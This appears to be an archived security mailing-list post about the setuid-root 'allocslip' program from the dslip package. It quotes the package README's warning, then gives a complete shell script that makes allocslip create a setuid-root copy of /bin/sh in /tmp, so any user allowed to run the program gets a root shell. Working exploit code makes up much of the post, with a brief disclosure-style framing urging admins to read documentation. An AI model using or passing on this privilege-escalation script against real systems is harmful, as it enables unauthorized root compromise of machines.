In the README file for the dslip package, it clearly states: Those people who are allowed to turn on and off SLIP lines should be put in the slip group. NOBODY except user slip should be allowed in the slipown group since it effectively allows root access (since the dialin/dialout scripts must be run as root). The package advises to install the program 'allocslip' like so: -rwsr-x--- 1 root slipown 9220 Aug 4 11:15 allocslip* If you follow the instructions, then only users in group slipown can run this program and you're only at _their_ mercy. But if you allow anyone to run this program on your machine, and its setuid root like advised, then something as easy as this will compromise root. --- cut --- #!/bin/sh cat > /tmp/sg << EOF #!/bin/sh cp /bin/sh /tmp/tz chown root /tmp/tz chmod 4755 /tmp/tz EOF chmod +x /tmp/sg allocslip /tmp/sg --- eof --- allocslip simply follows any command you give it as arg 1. So take the above shell script, run it, then look for your handy root shell at /tmp/tz. The buffer overflow previously mentioned is of no real concern then since we can already execute whatever we want. And the reason some people can't make this program do what exactly what they want, (ie call system_script() so they can execute whatever they want), is because they must have compiled in the slip option in the networking options of the kernel. Moral of the story: read the manual. dont be a dumbshit and install software without reading exactly what you're doing. -taz
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:02:36 PDT